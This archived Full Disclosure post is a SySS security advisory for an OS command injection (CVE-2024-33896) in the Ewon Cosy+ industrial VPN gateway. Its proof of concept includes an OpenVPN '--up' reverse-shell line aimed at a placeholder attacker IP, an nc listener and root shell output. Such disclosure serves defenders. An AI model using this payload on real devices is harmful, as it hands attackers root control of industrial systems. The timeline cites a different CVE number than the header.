lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <078a2c6f-1764-4625-8a70-537242a56673@syss.de>
Date: Sun, 11 Aug 2024 19:47:30 +0200
From: Moritz Abrell via Fulldisclosure <fulldisclosure@...lists.org>
To: <fulldisclosure@...lists.org>
Subject: [FD] Improper Neutralization of Special Elements used in an OS
 Command ('OS Command Injection') (CWE-78) CVE-2024-33896

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2024-018
Product:                   Ewon Cosy+
Manufacturer:              HMS Industrial Networks AB
Affected Version(s):       Firmware Versions: < 21.2s10 and < 22.1s3
Tested Version(s):         Firmware Version: 21.2s7
Vulnerability Type:        Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') (CWE-78)
Risk Level:                Medium
Solution Status:           Fixed
Manufacturer Notification: 2024-03-27
Solution Date:             2024-07-18
Public Disclosure:         2024-08-11
CVE Reference:             CVE-2024-33896
Author of Advisory:        Moritz Abrell, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The Ewon Cosy+ is a VPN gateway used for remote access and maintenance
in industrial environments.

The manufacturer describes the product as follows (see [1]):

"The Ewon Cosy+ gateway establishes a secure VPN connection between
the machine (PLC, HMI, or other devices) and the remote engineer.
The connection happens through Talk2m, a highly secured industrial
cloud service. The Ewon Cosy+ makes industrial remote access easy
and secure like never before!"

Due to improper neutralization of parameters read from a user-controlled
configuration file, an authenticated attacker is able to inject and execute
OS commands on the device.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Authenticated attackers are able to upload a custom OpenVPN configuration.
This configuration can contain the OpenVPN paramaters "--up" and "--down",
which execute a specified script or executable.

Since the process itself runs with the highest privileges (root),
this allows the device to be completely compromised.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

1. Generate a malicious OpenVPN configuration, e.g. instructing the device
     to create a reverse shell:

     client
     dev tun
     persist-tun
     proto tcp
     verb 5
     mute 20
     --up '/bin/sh -c "TF=$(mktemp -u);mkfifo $TF;telnet <attacker-ip> 5000 0<$TF | sh 1>$TF"'
     script-security 2
         [...]

2. Start a listener on the attacker system:
     #> nc -lvp 5000

3. Upload the OpenVPN configuration via FTP to Cosy+.

4. Set the configuration paramater "VPNCfgFile" to "/usr/<vpnfile>".

5. Command is executed by Cosy+ and a reverse shell is initiated:

     nc -lvp 5000
     istening on 0.0.0.0 5000
     Connection received on 192.168.10.240 56806
     id
     uid=0(root) gid=0(root)


Note:
     The paramaters "--up" and "--down" need to be specified with
     two dashes since the values "up" and "down" are blocklisted on the
     device.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

According to the manufacturer note[4], the vulnerability was fixed
with the firmware versions 21.2s10 and 22.1s3.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-03-26: Vulnerability discovered
2024-03-27: Vulnerability reported to manufacturer
2024-04-02: Inquiry about the status
2024-04-05: Manufacturer acknowlegded the vulnerability and started the
             analysis
2024-04-10: Two more vulnerabilities reported to the manufacturer
             (SYSS-2024-032 and SYSS-2024-033)
2024-04-11: Manufacturer acknowlegded the vulnerabilities and asked for
             a publication date for all findings
2024-04-12: Proposed dates for a discussion about publication
2024-04-15: Manufacturer sent a technical overview of planned remediation
             actions and details about the planned timeline
2024-04-15: Acknowlegded the remediation actions and asked the manufacturer
             for assigning a CVE ID
2024-04-30: CVE ID CVE-2024-33893[5] assigned by the manufacturer
2024-05-31: Manufacturer informed that the fix is in completion stage and
             asked if the blog post[6] can be reviewed by HMS
2024-06-04: Proposed dates to review the blog post draft
2024-06-21: Inquiry about the status
2024-06-21: Received an out-of-office auto reply
2024-07-01: Inquiry about the status
2024-07-04: Inquiry about the status
2024-07-12: Inquiry about the status and letting the manufacturer know that
             the vulnerability will be published within a talk at DEF CON[7]
             in August
2024-07-12: Manufacturer responded that the fix is planned by the end of
             July; manufacturer asked again for reviewing the blog post
             draft
2024-07-12: Again confirmed reviewing the blog post is possible and asking
             for the sending of details
2024-07-17: Blog post provided to HMS
2024-07-18: Fixed firmware versions 21.2s10 and 22.1s3 released by HMS
2024-07-23: Inquiry about the status
2024-07-23: Manufacturer reviewed the blog post and confirmed that a
             fix is provided
2024-07-29: Discussion with HMS about the blog post and final publication
             actions
2024-08-11: Vulnerability disclosed at DEF CON[7]
2024-08-11: Blog post published[6]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Ewon Cosy+ product website
     https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet
[2] SySS Security Advisory SYSS-2024-018
     https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-018.txt
[3] SySS Responsible Disclosure Policy
     https://www.syss.de/en/responsible-disclosure-policy
[4] Manufacturer note
     https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf
[5] CVE-2024-33896
     https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33896
[6] Blog post
     https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/
[7] DEF CON talk
     https://defcon.org/html/defcon-32/dc-32-speakers.html#54521

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail:moritz.abrell@...s.de
Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc
Key Fingerprint: 2927 7EB6 1A20 0679 79E9  87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL:http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmay41IACgkQrgyb+PE0
i1PIhQ//YBS1kK+SZAdwVcRCA1fPxKdfHVlHswwiQzyNWvTso35HsQm+cYOJd/zL
gb9JJ0VqgohVezL9UVJhkbEVZbUNwAX13XpcjQimsxcVgx5jCus/4JUCH3+9vPCx
lZyc+r5gzP7d3/a1sfGO739bkg8+itkp9jxhoZm5WOA+eg5Tz1j4tJN4uU79ikax
5HGubG3dxWq2EQPeEa4+eyKgQCRQTZzX+fiyqfSbRMQq7v4/GbMqH3FtI1CzxoZ3
HfsxQyPu3eUjQuykpMauwuwSgs11Yop9EBDzTuH1+OTmWUMy9exWmixcj/Sst+D9
6rHQkY+CozFy0ml4mQtp/CpN+Jj0op+BtSw1ILwLUL3aqXa96Ud+62ht9EDBQn/9
repfcR5hx9Lj9gfrn46ciW8S/Zy5PghYjOvxC75rsiU3ZHhp/aNF9uKgrdnbZGQe
+CzompLF3pM8bCSwtUEauEfK+XArUg0oiN/d2Dl3LMqHJoK4Q1DkgD5v4POmtHsM
HaSuE0i57fezwnELg5XNLKRpno57I4LEn1CWm4qebyJvAkodO32DGWAx+Qfh34tG
R3Lj71uH1ffepHxMzPsW1WHHnOqjsXQIYw6yq6eJqHwS/ygR/OTVnGri5e4Xq/tN
AZyo5WrR3iTmZMBhPAaDoLfclUG4IucGdJKGop9IKkeNTHXkuGk=
=75wq
-----END PGP SIGNATURE-----


Download attachment "smime.p7s" of type "application/pkcs7-signature" (4706 bytes)

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ